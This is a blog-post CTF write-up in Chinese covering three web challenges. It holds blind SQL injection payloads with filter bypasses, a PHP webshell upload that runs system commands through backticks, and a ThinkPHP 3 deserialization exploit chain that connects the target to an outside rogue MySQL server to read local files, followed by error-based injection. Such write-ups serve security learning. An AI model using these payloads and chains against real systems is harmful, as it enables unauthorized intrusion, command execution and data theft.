红明谷web部分wp

最新推荐文章于 2023-04-21 09:19:21 发布

N0Tai1学习又咕了

最新推荐文章于 2023-04-21 09:19:21 发布

阅读量269

点赞数

分类专栏：比赛

本文链接：https://blog.csdn.net/lllffg/article/details/115479724

版权

比赛专栏收录该内容

4 篇文章 0 订阅

订阅专栏

红明谷web部分wp

最后第十四，距离线下查一点点，还是打不过大师傅们

happysql

username="||(1)%23&password=1

成功回显

username="||(select(12)regexp(12))%23&password=1

成功回显

username="||(select(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats)regexp("f1ag"))%23&password=1

逐位拿到表名

username="||(select(select/**/*from/**/f1ag)regexp("flag{"))%23&password=1

因为脚本写的菜，所以用bp逐位爆破的…

在这里插入图片描述

-被过滤，用.匹配单个字符即可

在这里插入图片描述

username="||(select(select/**/*from/**/f1ag)regexp("flag{51495588-6b4a-4e92-b4a3-889b50bb6fcf}"))%23&password=1

write_shell

<?php
error_reporting(0);
highlight_file(__FILE__);
function check($input){
    if(preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i",$input)){
        // if(preg_match("/'| |_|=|php/",$input)){
        die('hacker!!!');
    }else{
        return $input;
    }
}

function waf($input){
  if(is_array($input)){
      foreach($input as $key=>$output){
          $input[$key] = waf($output);
      }
  }else{
      $input = check($input);
  }
}

$dir = 'sandbox/' . md5($_SERVER['REMOTE_ADDR']) . '/';
if(!file_exists($dir)){
    mkdir($dir);
}
switch($_GET["action"] ?? "") {
    case 'pwd':
        echo $dir;
        break;
    case 'upload':
        $data = $_GET["data"] ?? "";
        waf($data);
        file_put_contents("$dir" . "index.php", $data);
}
?>

?action=upload
&data=<?=`ls%09/`?>

?action=upload&data=<?=`nl%09../../../../../!*`?>

然后pwd看一下有一个!whatyouwantggggggg401.php

flag在注释里…

easytp

起一个服务

https://github.com/Gifts/Rogue-MySql-Server/blob/master/rogue_mysql_server.py

参考：https://mp.weixin.qq.com/s/S3Un1EM-cftFXr8hxG4qfA

几乎是原题

<?php
namespace Think\Db\Driver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true    // 开启才能读取文件
        );
        protected $config = array(
            "debug"    => 1,
            "database" => "thinkphp3",
            "hostname" => "8.141.49.228",
            "hostport" => "3307",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "root"
        );
    }
}

namespace Think\Image\Driver{
    use Think\Session\Driver\Memcache;
    class Imagick{
        private $img;

        public function __construct(){
            $this->img = new Memcache();
        }
    }
}

namespace Think\Session\Driver{
    use Think\Model;
    class Memcache{
        protected $handle;

        public function __construct(){
            $this->handle = new Model();
        }
    }
}

namespace Think{
    use Think\Db\Driver\Mysql;
    class Model{
        protected $options   = array();
        protected $pk;
        protected $data = array();
        protected $db = null;

        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(1,user(),1)#",
                "where" => "1=1"
            );
        }
    }
}
namespace {
    echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}

有数据库密码就能拿到flag

<?php
namespace Think\Db\Driver{
    use PDO;
    class Mysql{
        protected $options = array(
            PDO::MYSQL_ATTR_LOCAL_INFILE => true    // 开启才能读取文件
        );
        protected $config = array(
            "debug"    => 1,
            "database" => "thinkphp3",
            "hostname" => "127.0.0.1",
            "hostport" => "3306",
            "charset"  => "utf8",
            "username" => "root",
            "password" => "123456"
        );
    }
}

namespace Think\Image\Driver{
    use Think\Session\Driver\Memcache;
    class Imagick{
        private $img;

        public function __construct(){
            $this->img = new Memcache();
        }
    }
}

namespace Think\Session\Driver{
    use Think\Model;
    class Memcache{
        protected $handle;

        public function __construct(){
            $this->handle = new Model();
        }
    }
}

namespace Think{
    use Think\Db\Driver\Mysql;
    class Model{
        protected $options   = array();
        protected $pk;
        protected $data = array();
        protected $db = null;

        public function __construct(){
            $this->db = new Mysql();
            $this->options['where'] = '';
            $this->pk = 'id';
            $this->data[$this->pk] = array(
                "table" => "mysql.user where 1=updatexml(0x7e,user(),0x7e)#",
                "where" => "1=1"
            );
        }
    }
}

namespace {
    echo base64_encode(serialize(new Think\Image\Driver\Imagick()));
}

extractvalue(1,concat(0x7e,(select left(group_concat(table_name),10) from information_schema.tables where table_schema='tp')))#

然后报错注入出flag

N0Tai1学习又咕了

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
2
评论
红明谷web部分wp

红明谷web部分wp第十四距离线下赛差一点点，原地裂开happysqlusername="||(1)%23&password=1成功回显username="||(select(12)regexp(12))%23&password=1成功回显username="||(select(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats)regexp("f1ag"))%23&passw
复制链接

扫一扫